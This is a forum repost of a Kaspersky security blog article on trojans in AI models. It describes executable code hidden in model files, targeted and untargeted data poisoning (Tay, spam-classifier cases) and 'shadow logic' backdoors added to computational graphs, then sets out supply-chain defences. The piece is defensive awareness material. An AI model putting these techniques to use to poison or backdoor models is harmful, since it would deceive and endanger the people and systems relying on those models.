Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Share Post: Reddit Facebook
Trojans in AI models (KASPERSKY )
#1
https://www.kaspersky.com/blog/trojans-i...els/52724/    artificial intelligence
Trojans in AI models
Hidden logic, data poisoning, and other targeted attack methods via AI systems.


Stan Kaminsky

December 3, 2024    Over the coming decades, security risks associated with AI systems will be a major focus of researchers’ efforts. One of the least explored risks today is the possibility of trojanizing an AI model. This involves embedding hidden functionality or intentional errors into a machine learning system that appears to be working correctly at first glance. There are various methods to create such a Trojan horse, differing in complexity and scope — and they must all be protected against.

Malicious code in the model
Certain ML model storage formats can contain executable code. For example, arbitrary code can be executed while loading a file in a pickle format, the standard Python format used for data serialization (converting data into a form that is convenient for storing and transferring). Particularly, this format is used in a deep learning library PyTorch. In another popular machine learning library, TensorFlow, models in the .keras and HDF5 formats support a “lambda layer”, which also executes arbitrary Python commands. This code can easily conceal malicious functionality.

TensorFlow’s documentation includes a warning that a TensorFlow model can read and write files, send and receive network data, and even launch child processes. In other words, it’s essentially a full-fledged program.

Malicious code can activate as soon as an ML model is loaded. In February 2024, approximately 100 models with malicious functionality were discovered in the popular repository of public models, Hugging Face. Of these, 20% created a reverse shell on the infected device, and 10% launched additional software.

Training dataset poisoning
Models can be trojanized at the training stage by manipulating the initial datasets. This process, called data poisoning, can be either targeted or untargeted. Targeted poisoning trains a model to work incorrectly in specific cases (for example, always claiming that Yuri Gagarin was the first person on the Moon). Untargeted poisoning aims to degrade the model’s overall quality.

Targeted attacks are difficult to detect in a trained model because they require very specific input data. But poisoning the input data for a large model is costly, as it requires altering a significant volume of data without being detected.

In practice, there are known cases of manipulating models that continue to learn while in operation. The most striking example is the poisoning of Microsoft’s Tay chatbot, which was trained to express racist and extremist views in less than a day. A more practical example is the attempts to poison Gmail’s spam classifier. Here, attackers mark tens of thousands of spam emails as legitimate to allow more spam through to user inboxes.

The same goal can be achieved by altering training labels in annotated datasets or by injecting poisoned data into the fine-tuning process of a pre-trained model.

Shadow logic
A new method of maliciously modifying AI systems is to introduce additional branches into the model’s computational graph. This attack does not involve executable code or tampering with the training process, yet the modified model can exhibit a desired behavior in response to specific pre-determined input data.

The attack leverages the fact that machine learning models use a computational graph to structure the computations required for their training and execution. The graph describes the sequence in which neural network blocks are connected and defines their operational parameters. Computational graphs are designed for each model individually, although in some ML model architectures they are dynamic.

Researchers have demonstrated that the computational graph of an already trained model can be modified by adding a branch at the initial stages of its operation that detects a “special signal” in the input data; upon detection, the model is directed to operate under a separately programmed logic. In an example from the study, the popular video object detection model YOLO was modified to ignore people in a frame if a cup was also present.

The danger of this method lies in its applicability to any models, regardless of storage format, modality, or scope of application. A backdoor can be implemented for natural language processing, object detection, classification tasks, and multimodal language models. Moreover, such a modification can be preserved even if the model undergoes further training and fine-tuning.

How to protect AI models from backdoors
A key security measure is the thorough control of the supply chain. This means ensuring that the origin of every component in the AI system is known and free of malicious modifications, including:

The code running the AI model
The computing environment in which the model operates (usually cloud hosting)
The files of the model
The data used for training
The data used for fine-tuning
Major ML repositories are gradually implementing digital signatures to verify models’ origins and code.

In cases where strict control over the origins of data and code is not feasible, models from questionable sources should be avoided in favor of reputable providers’ offerings.

It’s also crucial to use secure formats for storing ML models. In the Hugging Face repository, warnings are displayed when loading models capable of executing code; also, the primary model storage format is Safetensor, which blocks code execution.


Attached Files Thumbnail(s)
           
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Malicious apps on Google Play dropped banking Trojans on user devices Bjyda 0 1,522 03-10-2021 , 12:17 AM
Last Post: Bjyda
  New German law would force ISPs to allow secret service to install trojans mrtrout 0 1,530 07-10-2020 , 02:50 AM
Last Post: mrtrout
  Malicious Optimizer and Utility Android Apps on Google Play Communicate with Trojans sidemoon 2 2,572 02-09-2020 , 07:51 AM
Last Post: ahmadkhaje
  Several Android phone models impacted by a critical zero-day vulnerability sidemoon 0 1,858 10-05-2019 , 02:37 PM
Last Post: sidemoon
  GandCrab returns with trojans and redundency LowcyGier 0 1,730 01-20-2019 , 06:21 AM
Last Post: LowcyGier



Users browsing this thread: 1 Guest(s)